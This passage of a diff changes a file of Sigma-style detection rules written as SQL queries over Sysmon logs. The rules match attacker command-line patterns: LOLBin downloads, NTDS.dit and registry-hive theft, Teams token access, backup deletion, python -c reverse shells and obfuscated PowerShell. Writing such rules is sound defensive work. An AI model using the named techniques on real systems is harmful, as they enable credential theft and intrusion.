CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR 
CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_wmic_susp_process_creation.yml" }, { - "title": "Pubprn.vbs Proxy Execution", - "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "status": "experimental", - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "author": "frack113", + "title": "DarkSide Ransomware Pattern", + "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "status": "test", + "description": "Detects DarkSide Ransomware and helpers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Unknown", + "UAC bypass method used by other malware" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_darkside_ransomware.yml" + }, + { + "title": "Abusing 
Print Executable", + "id": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "status": "test", + "description": "Attackers can use print.exe for remote file copy", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", "tags": [ "attack.defense_evasion", - "attack.t1216.001" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\print.exe' ESCAPE '\\' AND CommandLine LIKE 'print%' ESCAPE '\\' AND CommandLine LIKE '%/D%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\') AND NOT (CommandLine LIKE '%print.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pubprn.yml" + "filename": "proc_creation_win_print_remote_file_copy.yml" }, { - "title": "Add New Windows Capability - ProcCreation", - "id": "b36d01a3-ddaf-4804-be18-18a6247adfcd", + "title": "Python Inline Command Execution", + "id": "899133d5-4d7c-4a7f-94ee-27355c879d90", "status": "experimental", - "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", + "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate usage of the capabilities by administartors or users. Filter accordingly" + "Python libraries that use a flag starting with \"-c\". 
Filter according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-WindowsCapability%' ESCAPE '\\' AND CommandLine LIKE '%OpenSSH.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'python.exe' OR (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\')) AND CommandLine LIKE '% -c%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Python%' ESCAPE '\\' AND ParentImage LIKE '%\\\\python.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-E -s -m ensurepip -U --default-pip%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_add_windows_capability.yml" + "filename": "proc_creation_win_python_inline_command_execution.yml" }, { - "title": "Stop Windows Service Via Sc.EXE", - "id": "81bcb81b-5b1f-474b-b373-52c871aaa7b1", + "title": "PUA - Crassus Execution", + "id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "status": "experimental", - "description": "Detects the stopping of a Windows service", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Crassus a windows privilege escalation discovery tool based on PE metadata characteristics.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.discovery", + "attack.t1590.001" ], "falsepositives": [ - "There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. 
Filter legitimate activity accordingly" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'sc.exe' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\') AND NOT ((CommandLine IN ('sc stop KSCWebConsoleMessageQueue', 'sc stop LGHUBUpdaterService') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Crassus.exe' ESCAPE '\\' OR OriginalFileName = 'Crassus.exe' OR Description LIKE '%Crassus%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_stop_service.yml" + "filename": "proc_creation_win_pua_crassus.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "Sensitive Registry Access via Volume Shadow Copy", + "id": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "status": "experimental", + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% 
-name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\NTDS.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%\\\\SECURITY%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\tmp\\\\log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_malware_conti_shadowcopy.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", + "title": "Rundll32 With Suspicious Parent Process", + "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", + "author": "CD_ROM_", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.g0069" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_rundll32_parent_explorer.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Potential CVE-2022-29072 Exploitation Attempt", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. 
This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "cve.2022.29072" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Disable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Enable-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Export-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Get-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Grant-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Install-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Join-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%New-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Open-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Read-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Register-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Remove-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Restore-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Search-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Send-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Set-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Start-AADInt%' ESCAPE '\\' OR CommandLine LIKE '%Update-AADInt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentImage LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR 
CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" ], - "filename": "proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" }, { - "title": "HackTool - SILENTTRINITY Stager Execution", - "id": "03552375-cc2c-4883-bbe4-7958d5a980be", - "status": "test", - "description": "Detects SILENTTRINITY stager use via PE metadata", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" - ], + "title": "PUA - AdvancedRun Suspicious Execution", + "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "status": "experimental", + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Suspicious Usage Of ShellExec_RunDLL", - "id": "d87bd452-6da1-456e-8155-7dc988157b7d", + "title": "File Download Via Bitsadmin To An Uncommon Target Folder", + 
"id": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "status": "experimental", - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" + "filename": 
"proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" }, { - "title": "Potential File Overwrite Via Sysinternals SDelete", - "id": "a4824fca-976f-4964-b334-0621379e84c4", - "status": "experimental", - "description": "Detects the use of SDelete to erase a file not the free space", - "author": "frack113", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "status": "test", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_sdelete.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "PUA - Advanced Port Scanner Execution", - "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", - "status": "experimental", - "description": "Detects the use of Advanced Port Scanner.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron 
Systems)", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Legitimate administrative use", - "Tools with similar commandline (very rare)" + "Legitimate use by administrative staff" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_port\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_port\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced Port Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_advanced_port_scanner.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "SystemStateBackup Deleted Using Wbadmin.EXE", - "id": "89f75308-5b1b-4390-b2d8-d6b2340efaf8", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Deletes the Windows systemstatebackup using wbadmin.exe.\nThis technique is used by numerous ransomware families.\nThis may only be successful on server platforms that have Windows Backup enabled.\n", - "author": "frack113", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete %' ESCAPE '\\' AND CommandLine LIKE '%systemstatebackup %' ESCAPE '\\' AND CommandLine LIKE '%-keepVersions:0%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wbadmin_delete_systemstatebackup.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "Suspicious Command With Teams Objects Paths", - "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "Suspicious Firewall Configuration Discovery Via Netsh.EXE", - "id": "0e4164da-94bc-450d-a7be-a4b176179f1f", + "title": "CMD Shell Output Redirect", + "id": "4f4eaa9f-5ad4-410c-a4be-bc6132b0175a", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects the use of the redirection character \">\" to redicrect information in commandline", + "author": "frack113", "tags": [ 
"attack.discovery", - "attack.t1016" + "attack.t1082" ], "falsepositives": [ - "Administrative activity" + "Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment" ], "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%netsh %' ESCAPE '\\' AND CommandLine LIKE '%show %' ESCAPE '\\' AND CommandLine LIKE '%firewall %' ESCAPE '\\' AND (CommandLine LIKE '%config %' ESCAPE '\\' OR CommandLine LIKE '%state %' ESCAPE '\\' OR CommandLine LIKE '%rule %' ESCAPE '\\' OR CommandLine LIKE '%name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Internet Download Manager\\\\IDMMsgHost.exe%' ESCAPE '\\' OR CommandLine LIKE '%chrome-extension://%' ESCAPE '\\' OR CommandLine LIKE '%\\\\.\\\\pipe\\\\chrome.nativeMessaging%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_rules_discovery.yml" + "filename": "proc_creation_win_cmd_redirect.yml" }, { - "title": "PUA - Seatbelt Execution", - "id": "38646daa-e78f-4ace-9de0-55547b2d30da", + "title": "Suspicious High IntegrityLevel Conhost Legacy Option", + "id": "3037d961-21e9-4732-b27a-637bcc7bf539", "status": "experimental", - "description": "Detects the execution of the PUA/Recon tool Seatbelt via PE information of command line parameters", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. 
High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1526", - "attack.t1087", - "attack.t1083" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Very Likely, including launching cmd.exe via Run As Administrator" ], - "level": "high", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Seatbelt.exe' ESCAPE '\\' OR OriginalFileName = 'Seatbelt.exe' OR Description = 'Seatbelt' OR (CommandLine LIKE '% DpapiMasterKeys%' ESCAPE '\\' OR CommandLine LIKE '% InterestingProcesses%' ESCAPE '\\' OR CommandLine LIKE '% InterestingFiles%' ESCAPE '\\' OR CommandLine LIKE '% CertificateThumbprints%' ESCAPE '\\' OR CommandLine LIKE 